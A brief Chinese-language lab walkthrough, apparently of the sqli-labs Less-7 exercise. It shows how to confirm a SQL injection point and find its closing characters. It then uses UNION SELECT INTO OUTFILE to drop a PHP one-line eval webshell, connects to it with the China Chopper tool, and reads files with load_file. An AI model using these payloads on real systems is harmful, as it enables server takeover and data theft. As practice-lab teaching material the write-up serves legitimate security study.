SQL注入写入读取文件(实验)
1.1第一步,判断是否存在SQL注入,我们输入http://www.any.com/sqli/Less-7/?id=1,发现页面返回正常。
1.2加入单引号,输入www.any.com/sqli/Less-7/?id=1',此时发现页面返回不正常,报错,这是我们判断此处存在SQL注入
1.3此时我们来判断闭合字符输入http://www.any.com/sqli/Less-7/?id=1' and 1=1 %23,回显不正常
输入http://www.any.com/sqli/Less-7/?id=1') and 1=1 %23,回显不正常
输入http://www.any.com/sqli/Less-7/?id=1')) and 1=1 %23,回显正常
输入http://www.any.com/sqli/Less-7/?id=1')) and 1=2 %23,回显不正常
1.4这是我们就要利用以上所学知识写入一句话木马文件,我们输入:
http://www.any.com/sqli/Less-7/?id=1')) union select 1,'2','<?php @eval($_POST[a]);?>' into outfile 'c:/www/2.php'%23,虽然显示报错,但其实我们还是写了进去。
1.5此时,我们上中国菜刀工具,右击点击空白处,选择添加,在对话框中输入http://www.any.com/2.php,密码填写a,点击添加即可获取shell。
1.6下面进行读取文件,我们输入:http://www.any.com/sqli/Less-7/?id=1')) union select 1,2,load_file("C:/WWW/2.php") into outfile 'C:/WWW/3.php'%23,虽然报错了,但是我们还是让它读取到了2.php里的内容,然后让它以3.php写入了进去
